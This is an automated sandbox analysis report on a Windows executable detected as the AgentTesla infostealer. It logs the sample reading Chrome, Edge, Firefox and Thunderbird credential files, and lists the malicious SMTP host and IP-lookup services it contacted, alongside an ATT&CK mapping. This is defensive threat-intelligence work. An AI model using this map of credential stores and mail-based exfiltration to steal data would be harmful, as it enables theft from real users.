Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\ulf4JrCRk2.exe

Code function: 0_2_00405D13 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

0_2_00405D13

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000005.00000002.2626602783.0000000023CED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2626602783.0000000023CC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msiexec.exe PID: 764, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior

Source: Yara match	File source: 00000005.00000002.2626602783.0000000023CC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msiexec.exe PID: 764, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000005.00000002.2626602783.0000000023CED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2626602783.0000000023CC4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: msiexec.exe PID: 764, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Obfuscated Files or Information	1 OS Credential Dumping	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	311 Process Injection	1 Software Packing	LSASS Memory	24 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 DLL Side-Loading	Security Account Manager	321 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Masquerading	NTDS	1 Process Discovery	Distributed Component Object Model	1 Clipboard Data	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	141 Virtualization/Sandbox Evasion	LSA Secrets	141 Virtualization/Sandbox Evasion	SSH	Keylogging	23 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	311 Process Injection	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
ulf4JrCRk2.exe	16%	ReversingLabs	Win32.Trojan.Generic

Source	Detection	Scanner	Label	Link
http://smtp.santonswitchgears.com	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
us2.smtp.mailhostbox.com	208.91.199.223	true	true	unknown
s-part-0017.t-0009.fb-t-msedge.net	13.107.253.45	true	false	high
drive.google.com	216.58.206.46	true	false	high
drive.usercontent.google.com	142.250.185.193	true	false	high
api.ipify.org	172.67.74.152	true	false	high
ip-api.com	208.95.112.1	true	false	high
smtp.santonswitchgears.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.ipify.org/	false		high
http://ip-api.com/line/?fields=hosting	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.google.com	msiexec.exe, 00000005.00000003.1665700699.00000000083F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1665641488.00000000083F1000.00000004.00000020.00020000.00000000.sdmp	false		high
http://nuget.org/NuGet.exe	powershell.exe, 00000002.00000002.1559586535.0000000005C47000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.ipify.org	msiexec.exe, 00000005.00000002.2626602783.0000000023C61000.00000004.00000800.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_Error	ulf4JrCRk2.exe	false		high
http://crl.micro	powershell.exe, 00000002.00000002.1555618352.00000000029B3000.00000004.00000020.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000002.00000002.1556687538.0000000004D36000.00000004.00000800.00020000.00000000.sdmp	false		high
http://smtp.santonswitchgears.com	msiexec.exe, 00000005.00000002.2626602783.0000000023CED000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://us2.smtp.mailhostbox.com	msiexec.exe, 00000005.00000002.2626602783.0000000023CED000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/pscore6lB	powershell.exe, 00000002.00000002.1556687538.0000000004BE1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000002.00000002.1556687538.0000000004D36000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.google.com/	msiexec.exe, 00000005.00000002.2614911399.00000000083BF000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000002.00000002.1559586535.0000000005C47000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000002.00000002.1559586535.0000000005C47000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000002.00000002.1559586535.0000000005C47000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ip-api.com	msiexec.exe, 00000005.00000002.2626602783.0000000023CB1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000002.00000002.1559586535.0000000005C47000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.usercontent.google.com/	msiexec.exe, 00000005.00000002.2614911399.00000000083EB000.00000004.00000020.00020000.00000000.sdmp	false		high
https://apis.google.com	msiexec.exe, 00000005.00000003.1665700699.00000000083F1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1665641488.00000000083F1000.00000004.00000020.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	ulf4JrCRk2.exe	false		high
https://api.ipify.org/t	msiexec.exe, 00000005.00000002.2626602783.0000000023C61000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000002.00000002.1556687538.0000000004BE1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2626602783.0000000023C61000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000002.00000002.1556687538.0000000004D36000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.185.193	drive.usercontent.google.com	United States	15169	GOOGLEUS	false
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	false
208.91.199.223	us2.smtp.mailhostbox.com	United States	394695	PUBLIC-DOMAIN-REGISTRYUS	true
216.58.206.46	drive.google.com	United States	15169	GOOGLEUS	false
172.67.74.152	api.ipify.org	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1549408
Start date and time:	2024-11-05 16:08:57 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 58s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	ulf4JrCRk2.exe renamed because original name is a hash value
Original Sample Name:	26d13e127041233e0a01a631c489b05b175a3c91a2cb2bf289a4188d483d317c.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@17/11@5/5
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 97% Number of executed functions: 145 Number of non-executed functions: 27
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): azurefd-t-fb-prod.trafficmanager.net, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 2804 because it is empty
Not all processes where analyzed, report is missing behavior information
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: ulf4JrCRk2.exe

Simulations

Behavior and APIs

Time	Type	Description
10:09:49	API Interceptor	35x Sleep call for process: powershell.exe modified
10:10:25	API Interceptor	676895x Sleep call for process: msiexec.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
208.95.112.1	Nt8BLNLKN7.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	ip-api.com/line/?fields=hosting
	NOuxGNqQH7.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	IPx5gzPi7I.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	copto de pago.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	RDF987656789000.cmd.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	orden de compra_.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	2q8mDVUlgI.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	iu56HJ45NV.exe	Get hash	malicious	Unknown	Browse	ip-api.com/json/?fields=225545
	SecuriteInfo.com.Trojan.DownLoader47.48553.17653.26482.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	QUOTATION#09678.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
208.91.199.223	Nt8BLNLKN7.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Proforma Invoice_21-1541 And Packing List.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	PO.exe	Get hash	malicious	AgentTesla	Browse
	Request for Quotation Plug Valve.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Purchase Order 007823-PO# 005307.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	z9OutstandingPayment.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	SecuriteInfo.com.Win32.RATX-gen.3768.11045.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	UPDATED FLOOR PLAN_3D.EXE.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	New Order PO#86637.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
172.67.74.152	2b7cu0KwZl.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	Zc9eO57fgF.elf	Get hash	malicious	Unknown	Browse	api.ipify.org/
	67065b4c84713_Javiles.exe	Get hash	malicious	RDPWrap Tool	Browse	api.ipify.org/
	Yc9hcFC1ux.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	4F08j2Rmd9.bin	Get hash	malicious	Xmrig	Browse	api.ipify.org/
	y8tCHz7CwC.bin	Get hash	malicious	Xmrig	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	RDPWrap Tool	Browse	api.ipify.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
us2.smtp.mailhostbox.com	Nt8BLNLKN7.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	208.91.199.223
	copto de pago.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.224
	SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	208.91.199.223
	Proforma Invoice_21-1541 And Packing List.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	208.91.199.223
	Tax Invoice 103505.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	208.91.199.224
	PO.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.223
	Purchase_Order.exe	Get hash	malicious	AgentTesla	Browse	208.91.198.143
	Scanned.pdf.pif.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	208.91.199.225
	Request for Quotation Plug Valve.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	208.91.199.223
	Cotizaci#U00f3n P13000996 pdf.exe	Get hash	malicious	AgentTesla	Browse	208.91.198.143
ip-api.com	Nt8BLNLKN7.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	208.95.112.1
	NOuxGNqQH7.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	IPx5gzPi7I.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	copto de pago.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	RDF987656789000.cmd.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	orden de compra_.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	2q8mDVUlgI.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	iu56HJ45NV.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	SecuriteInfo.com.Trojan.DownLoader47.48553.17653.26482.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	QUOTATION#09678.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
s-part-0017.t-0009.fb-t-msedge.net	https://virtual.urban-orthodontics.com	Get hash	malicious	Unknown	Browse	13.107.253.45
	https://micheline.aceflavall.com/	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	13.107.253.45
	file.exe	Get hash	malicious	PureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, XWorm	Browse	13.107.253.45
	b9Mm2hq1pU.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	13.107.253.45
	s200ld6btf.exe	Get hash	malicious	FormBook	Browse	13.107.253.45
	https://bulbapp.com/u/sharefile?sharedLink=1db1fe96-5bdb-4c8c-ba45-33caa906abdd	Get hash	malicious	HTMLPhisher	Browse	13.107.253.45
	https://1drv.ms/o/c/66fa7da2ba9759b3/EqcaXs4PlQlIgYgaPtxczNwB_gWaZXRP_eT5RhV50i4cxw?e=5%3aJHIMrP&sharingv2=true&fromShare=true&at=9	Get hash	malicious	Unknown	Browse	13.107.253.45
	Ransomware VXUG Ransom.exe	Get hash	malicious	CryLock, LOCKFILE	Browse	13.107.253.45
	https://load.contbot.com.br/	Get hash	malicious	Unknown	Browse	13.107.253.45
	Ziraat Bankasi Swift Mesaji..exe	Get hash	malicious	Snake Keylogger	Browse	13.107.253.45
api.ipify.org	D6yz87XjgM.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	Nt8BLNLKN7.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	172.67.74.152
	Quotation.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	172.67.74.152
	b9Mm2hq1pU.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.26.13.205
	https://mlflegal.sharefile.com/public/share/web-s929b2bfc135a4aadb68ad5b8c7324a2e	Get hash	malicious	Unknown	Browse	172.67.74.152
	Ransomware Mallox.exe	Get hash	malicious	Targeted Ransomware	Browse	104.26.12.205
	COTIZACION.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	104.26.12.205
	REVISED PO NO.8389.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	https://www.canva.com/design/DAGVlowNqco/LaGv3kp6ecOkwIXDSEYQLQ/view?utm_content=DAGVlowNqco&utm_campaign=designshare&utm_medium=link&utm_source=editor	Get hash	malicious	Unknown	Browse	104.26.12.205
	Shipping documents.bat.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	172.67.74.152

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TUT-ASUS	Nt8BLNLKN7.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	208.95.112.1
	NOuxGNqQH7.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	IPx5gzPi7I.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	copto de pago.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	RDF987656789000.cmd.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	orden de compra_.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	2q8mDVUlgI.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	iu56HJ45NV.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	SecuriteInfo.com.Trojan.DownLoader47.48553.17653.26482.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	QUOTATION#09678.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
PUBLIC-DOMAIN-REGISTRYUS	Nt8BLNLKN7.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	208.91.199.223
	p4rsJEIb7k.exe	Get hash	malicious	FormBook	Browse	119.18.54.27
	copto de pago.exe	Get hash	malicious	AgentTesla	Browse	208.91.199.224
	1364. 2024.exe	Get hash	malicious	AgentTesla	Browse	199.79.62.115
	Quote_220072.exe	Get hash	malicious	AgentTesla	Browse	199.79.62.115
	TT Copy.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	199.79.62.115
	24-17745.exe	Get hash	malicious	AgentTesla	Browse	199.79.62.115
	HSBC Payment Advice.exe	Get hash	malicious	FormBook	Browse	208.91.199.22
	H33UCslPzv.exe	Get hash	malicious	XWorm	Browse	103.53.40.62
	PILNE ZAPYTANIE RFQ-05567-2024.10.25.vbs	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	199.79.62.19
CLOUDFLARENETUS	https://micheline.aceflavall.com/	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	104.21.20.47
	D6yz87XjgM.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	http://www.axa-assistance.co.uk	Get hash	malicious	Unknown	Browse	104.18.86.42
	Nt8BLNLKN7.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	172.67.74.152
	L#U043e#U0430der.exe	Get hash	malicious	LummaC	Browse	172.67.187.9
	https://www.primechoicefinance.com.au/dykjj.php?7096797967704b53693230746450797938717a5330754c4530737a736a58533837503155744a31533870547662544277413dYnJhc3dlbGxzQGhlbGVuYWluZHVzdHJpZXMuY29t	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	p4rsJEIb7k.exe	Get hash	malicious	FormBook	Browse	104.21.94.87
	https://www.imap.ne.jp/banner_click/add/20/1/?a&url=http://uniteseoul.com	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	Fuji Xerox ENCLOSED - Revised DRAFT.pdf	Get hash	malicious	Unknown	Browse	104.17.25.14
	QzX4KXBXPq.exe	Get hash	malicious	LummaC	Browse	188.114.97.3

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	D6yz87XjgM.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	http://www.axa-assistance.co.uk	Get hash	malicious	Unknown	Browse	172.67.74.152
	Nt8BLNLKN7.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	172.67.74.152
	https://www.imap.ne.jp/banner_click/add/20/1/?a&url=http://uniteseoul.com	Get hash	malicious	HTMLPhisher	Browse	172.67.74.152
	QzX4KXBXPq.exe	Get hash	malicious	LummaC	Browse	172.67.74.152
	5jh97SOa7H.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.74.152
	Quotation.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	172.67.74.152
	RFQABCO004806L____________________pdf.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.74.152
	b9Mm2hq1pU.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	172.67.74.152
	file.exe	Get hash	malicious	LummaC, XWorm	Browse	172.67.74.152
37f463bf4616ecd445d4a1937da06e19	Nt8BLNLKN7.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	142.250.185.193 216.58.206.46
	LqtjSIsoCg.exe	Get hash	malicious	GuLoader	Browse	142.250.185.193 216.58.206.46
	EQ_AW24 New Order Request.xlx.exe	Get hash	malicious	GuLoader, StormKitty, XWorm	Browse	142.250.185.193 216.58.206.46
	5jh97SOa7H.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	142.250.185.193 216.58.206.46
	Quotation.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	142.250.185.193 216.58.206.46
	ImDbHt7AA4.exe	Get hash	malicious	DarkCloud	Browse	142.250.185.193 216.58.206.46
	COTIZACION.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	142.250.185.193 216.58.206.46
	HATCH COVER REQ_AW24 New Order Request.exe	Get hash	malicious	GuLoader	Browse	142.250.185.193 216.58.206.46
	EL GINER.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	142.250.185.193 216.58.206.46
	rFactura02Presupuesto_9209Urbia_pdf_.exe	Get hash	malicious	FormBook, GuLoader	Browse	142.250.185.193 216.58.206.46

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	14744
Entropy (8bit):	4.992175361088568
Encrypted:	false
